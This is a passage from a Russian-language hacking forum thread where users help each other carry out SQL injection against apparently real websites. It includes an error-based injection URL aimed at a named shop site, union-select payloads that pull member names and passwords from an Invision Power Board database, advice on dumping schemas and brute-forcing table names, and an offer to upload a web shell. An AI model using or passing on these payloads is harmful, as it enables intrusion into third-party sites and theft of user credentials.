Ваши вопросы по уязвимостям.

так что дай адрес, шелл зальем, самому любопытно стало

 

так пишет

Unknown column '4348415241435445525F53455453' in 'where clause'

 

потому что нужно unhex(hex())

зы

http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),rand(0)|0)+having+min(0)--+

 

Вывод в hex, поэтому нужно конвертировать в строку.
unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.

 

https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)

 

запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?

 

Думаю фильтруется точка.

 

Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))

м, глянул твой пост - красиво вскрыл!

 

infornation написано с ошибкой.

 

чакэ, да, ошибся, но запрос не изменило
Ereee, как можно послать запрос? hex? он не сработал

 

При такой опечатке выдало бы другую ошибку.

faza02,
hex тебе не поможет, я думаю фильтрацию точки обойти нельзя. Попробуй брутить имена таблиц(стандартные users, admin, members и т.д.), смотри на движки и узнай имена таблиц здесь:
http://dbitems.wen.ru

 

как я такое бревно не заметил select ololo from information..

 

Здаствуйте!
Не могу найти пасс админа. Итак, базы:

Нашел что-то похожее на правду в базе ibf_admin_login_logs:

По структуре:

 

2York,
-1'+union+select+1,concat(name,0x3a,password),3+from+ibf_members+limit+0,1--+a

 

сливай бд через columns, а не tables. а там заодно тяни table_name & table_schema сразу будет видно что где лежит..

 

Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admin_ip_address,0x3a,admin_username,0x3a,admin_time,0x3a,admin_success,0x3a,admin_post_details),3,4,5,6+from+ibf_admin_login_logs

 

хрен ты там найдешь логин админа..они совсем в другой таблице...изучи сначала структуру ИПБ потом изучи синтаксис мускуля..

 

York

почитайте статьи, срач запрещено

NZT, вопросы по сканерам и по крекерам интернета отправьте в гугл =\

 

есть скуля, все выводится и работает но посылая например такой запрос

SELECT `name` FROM `users` WHERE `user_id` = 1

сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.

вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине

 

Konqi со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?